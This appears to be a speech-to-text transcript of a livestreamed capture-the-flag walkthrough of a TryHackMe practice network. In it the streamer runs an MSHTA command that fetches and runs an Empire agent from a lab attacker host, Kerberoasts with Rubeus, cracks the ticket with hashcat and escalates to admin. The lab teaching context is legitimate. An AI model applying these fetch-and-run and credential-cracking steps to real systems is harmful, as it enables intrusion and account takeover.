6 is fine And I am now Running on 50.3.2 So we'll use quad 6 Okay So if I create a new stager With MSHTA Would I just be able to like Do it Like do I just run MSHTA and then like the thing I'll put copied to clipboard What did that actually do So I have this MSHTA thing And I could host that With MSHTA or like Agent.HTA I guess I'll call that that And Maybe that will get an agent callback Hopefully That one's hosting, that HTTP server is hosting So Over on .579 I should be able to MSHTA, HTTP 10.50.3.2 8000 Agent.HTA I forgot a space It ran it It triggered It got it successfully Oh sorry You can see that there in the logs And over in Star Killer If I Bump around do I have a new Agent at all I'm bad at this I did a PowerShell one previously What happened to the other listener That's not right That host is wrong Can I edit this I cannot seem to edit this What What Kill that thing We're a new listener on HTTP And that's what it should be It should be HTTP.1 I guess it's now just giving it a new name And There's a Stagers And That goes to HTTP That would have been an old one So maybe that's not right Let's make a new one Let's Use The batch launcher And let's use that HTTP.1 Let's just see that That will behave Because now HTTP.1 Is going to be at the right host in the right port And I have this Windows Launcher.bat Let's Put it in that Meturpreter directory And let's just take a look at it real quick So Can I run that I'm glad you have faith dude You know me I don't Let's put that in Launcher.bat And let's put Launcher.bat in here So we should see in the background Let's make this request Which we do And we have Launcher.bat And I can dot slash Launcher.bat And it should close the window When it properly starts the agent And I have a new agent Alright Thanks Jaximus I appreciate you extending the lab for me Alright we got an agent Alright So Now we can run some modules Rubius Go And that will take some time From what I remember In the last Stuff Oh it needed a command F Shoot Okay it just didn't have Didn't have a Didn't have a thing to do My bad Module name Rubius Rubus Command Kerber roast Right And just let it go Okay Because it's an HTTP C2 cycle It takes 5 seconds getting back to me Rough I saw some output though Let's see what we got here Run Rubius Got a new hash Is that literally it Do I literally need to crack this hash again Are you serious Are we gonna be doing More More collab cat Pass the hash Can I do pass the hash? I feel like I need to crack this Yep Back to my old collab cat What vulnerable service What vulnerable account TB service What password can be cracked Let's get back At our friend collab cat But first Let's clean This stinking hash Move all those new lines Make this thing behave Alrighty TB service Final hash This stream has been brought to you in part by Collab cat That's a good joke Sponsor, just kidding Collab cat Bring me back This is all shout out and thanks to Collab, or to Jaximus coming in clutch Offering his Connection pack Oh yeah, too much line is texted Funny Here we go Let's use the One rule to rule them all Utility So let's while we're waiting We can go ahead and stage this command We're gonna end up using hash cat And I think this is Like 381 I think this is one of the three Hash types It is CBRTG That guy, so let's go back to that And let's search for him Yeah, it's 13100 Okay So It's this thing We need to CD into Drive My drive Dot hash cat And then we need to echo This big long thing Into Last dot text So specify that mode We'll use the tack a zero Because people tell me that I should And we'll use one rule to Rule them all Dot rule And Last dot text with Rock you dot text So How is hash cat doing He's still compiling over there But I think We are pretty well staged We just got to let this boy go Waiting for my said Command to tell me that we're done Hmm Boy oh boy We're almost at the end I feel like we're basically at the end It's been fun, hey thanks Jackson You're the man, thank you so so much For Helping out This has been a really awesome Learning experience for me So I'm really grateful For all this learning Hash cat now works So let's start to Slap some of these commands in Can I get a quick synopsis Of collab cat It's just crowdsource cracking It is Google collab And they're kind of online sourced For being able to run commands and use some resources And it's set up With hash cat so Or you can set it up with hash cat Stage to run with hash cat So it actually Is fast For cracking hashes Why not just run it locally So I'm streaming Right now, right And it kind of really Really slows down the stream And it might take forever for it to crack On my GPU Not forever, right It would just be like 10 hours Or 8 hours My GPU would be like I'm trying to help But I wonder if we actually Need the one rule to rule them all right now Or I wonder if we're just making it worse Because this is taking longer Than it usually does Normally Collab cats like done Can I run like a separate Hash cat Session that's not running With the rules What password could be cracked From the Kerberos ticket Yeah, I was going to say Only one at a time, there's no way that I could run another That looks like a long Password though Like this This looks like something that would have rules in it Or would need rules in it Am I wrong In that I will forever Go to collab cat though Now that I like know and understand this thing Maybe filter the word list By max characters before cracking That's an option Part of me wonders how long it'll take This thing to run through Everything that it has Oh I guess it's 0.19% done So that probably doesn't help Let's Quit this one And try without rules Just to see Yeah I was going to say how are the rules Just let them go And that's a very good thing that we did that Because it is immediately cracked What do we got What's our password here Security admin That thing Oh boy Final hash crack That is the User TB secret So what can I do at this point How Am I Realistically Supposed to Do that RDP SSH any of them Can I do a run as Yeah Yeah I did it We did it We are in the net user Are we an admin Yeah Yeah I need a sig and run type Keeping it real all the way till the end Wow Holy cow What A journey Quick draw on the flag Submission real quick Full screen for the full effect Hit the submit button Go down to game over Be done with it Oh my goodness Wow What A journey Congratulations everybody thank you You guys are the ones that helped me Through this thing I hope you learned more than I did We spent what 12 hours 14-15 hours on this So much time Let's check out that certificate Firefox is prevented from Opening a pop-up Because that's malware Open that thing Wow Thanks so much everybody Jaximus Kudos and credit to you You've been incredible Special shout out and thank you to Krillix for one thing Making this gosh darn thing Same thing with Darkstar, same thing with Ashley, same thing with Ben Same thing with Spooky Dark Everyone has been incredible and fantastic For putting this together I learned a ton At least I feel like I learned a ton I hope I retain a lot of it CME, Crackmap, exec Starkiller, Empire Kerberoasting Secret Stump, Impact Bloodhound There's so much that we've worked through For this And we finally made it to the end Wow I don't know how to end this stream now You know We've accomplished so much Yeah, that felt like we really Had a lot going on I am really really Grateful for The hand holding And I don't want to say hand holding Right Because it's not what it was I still felt like I Was doing it I appreciate all the background And all the information That This was willing to offer To kind of help me I don't know, get up to speed I appreciate it showcasing and explaining Some of the offensive power shells Some of all the stuff We got a really great learning value With setting Windows Defender real time monitoring And turning that off That was kind of cool And finally your boy on twitter Jaximus is Throwing his twitter account out here Here we go, here we go Follow Jaximus, this is a really sketchy look In twitter page dude I'm kidding, I'm kidding This is fantastic, thank you so much Thank you everyone for tuning in Thanks for everyone watching And thanks for having a great time with me I really hope that This helped you Look behind the curtain as to what throwback is What the TriHackMe Network showcases And helps you learn Because this was all A lot of new stuff for me This was things that I haven't explored before And that was probably pretty evident In everything that we worked through But this has been an absolute blast So I can't say it enough, thanks so much Now We need to end this stream And we need to go to bed Because it's three in the morning So Thank you everybody I'm gonna hop over to OBS And call tonight What should we do next? What should we do next? What else are we gonna stream? I don't know, let me know Thanks all Take care everybody, have a good night I love you, I'll see you later